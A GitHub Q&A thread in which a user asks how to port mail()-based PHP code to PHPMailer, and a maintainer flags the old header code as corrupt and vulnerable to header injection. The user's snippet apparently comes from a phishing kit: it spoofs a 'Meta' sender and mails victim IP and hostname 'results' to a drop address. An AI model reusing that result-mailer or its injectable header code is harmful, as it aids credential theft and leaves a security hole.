### DISCUSSION TITLE
Set Custom Header

### DISCUSSION THREAD

**Discussion by FuckingToasters** [PHPMailer/PHPMailer#2725] [Q&A]
Hello, I never worked with PHP before and got a code which use mail() function. I now want to upgrade it to use phpmailer and found that it use following code to send mails using the mail() function:
```php
$message .= "HostName : ".$hostname."\n";
$message .= "-------------------------------------------------\n";
$send = "example@gmail.com";
$subject = "Result from $ip";
$headers = "From: Meta<custome556pport@Spammershhhhmm.com>";
$headers .= $_POST['example@gmail.com']."\n";
$headers .= "MIME-Version: 1.0\n";
```
```php
}
     mail($send,$subject,$message,$headers);
     mail($to,$subject,$message,$headers);
}
```
I now need to convert this to phpmailer code and created following code so far:
```php
$arr=array($send, $IP);
foreach ($arr as $send)
{

     $mail = new PHPMailer(true);

     try {
     //Server settings
     $mail->SMTPDebug = SMTP::DEBUG_SERVER;                      //Enable verbose debug output
     $mail->isSMTP();                                            //Send using SMTP
     $mail->Host       = 'smtp.example.com';                     //Set the SMTP server to send through
     $mail->SMTPAuth   = true;                                   //Enable SMTP authentication
     $mail->Username   = 'user@example.com';                     //SMTP username
     $mail->Password   = 'secret';                               //SMTP password
     $mail->SMTPSecure = PHPMailer::ENCRYPTION_SMTPS;            //Enable implicit TLS encryption
     $mail->Port       = 465;                                    //TCP port to connect to; use 587 if you have set `SMTPSecure = PHPMailer::ENCRYPTION_STARTTLS`

     //Recipients
     $mail->setFrom('from@example.com', 'Mailer');
     $mail->addAddress('joe@example.net', 'Joe User');     //Add a recipient
     $mail->addAddress('ellen@example.com');               //Name is optional
     $mail->addReplyTo('info@example.com', 'Information');
     $mail->addCC('cc@example.com');
     $mail->addBCC('bcc@example.com');

     //Content
     $mail->isHTML(true);
     $mail->Subject = $subject;
     $mail->Body    = $message;
     $mail->AltBody = 'This is the body in plain text for non-HTML mail clients';

     $mail->send();
     echo 'Message has been sent';
     } catch (Exception $e) {
     echo "Message could not be sent. Mailer Error: {$mail->ErrorInfo}";
     }
}
```
As you might have noticed already, in the mail function a $header is passed. I'm unsure how i can pass this header using phpmailer. Would be nice to hear back soon.

Regards,
FuckingToasters

**Comment by Synchro** [comment]
For the most part you don't need to because PHPMailer will generate all those standard headers automatically. Also the syntax you were previously using makes little sense: it will generate a corrupt header, and it's also vulnerable to header injection attack.

If you do want to add additional custom headers (though don't duplicate auto-generated ones; that will not go well), your first stop (as for any library) should be [the docs](https://phpmailer.github.io/PHPMailer/classes/PHPMailer-PHPMailer-PHPMailer.html#method_addCustomHeader). Simple example:

    $mail->addCustomHeader('HeaderName', 'value');

**Reply by FuckingToasters** [reply]
Thank you for the Information. I'm unsure what I need to set as header name and header value. On the previous code, the header variables only included one string.

**Reply by Synchro** [reply]
Yes, and the way that was included is the thing that is vulnerable to attack. Better to figure out what you're actually trying to do rather than duplicating inexplicable code. It's quite likely you don't need it at all.

**Reply by FuckingToasters** [reply]
Now it somehow can't connect to the smtp... i used the correct hostname (smtp.google.com), the correct username (my emailaddress) and as password i used the password to my google account. the issue is following:
```php
2022-07-01 17:01:54 SMTP ERROR: Failed to connect to server: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. (10060) 2022-07-01 17:01:54 SMTP Error: Could not connect to SMTP host.
Fatal error: Uncaught Error: Call to undefined function puts() in C:\xampp\htdocs\website\process.php:92 Stack trace: #0 {main} thrown in C:\xampp\htdocs\website\process.php on line 92
```
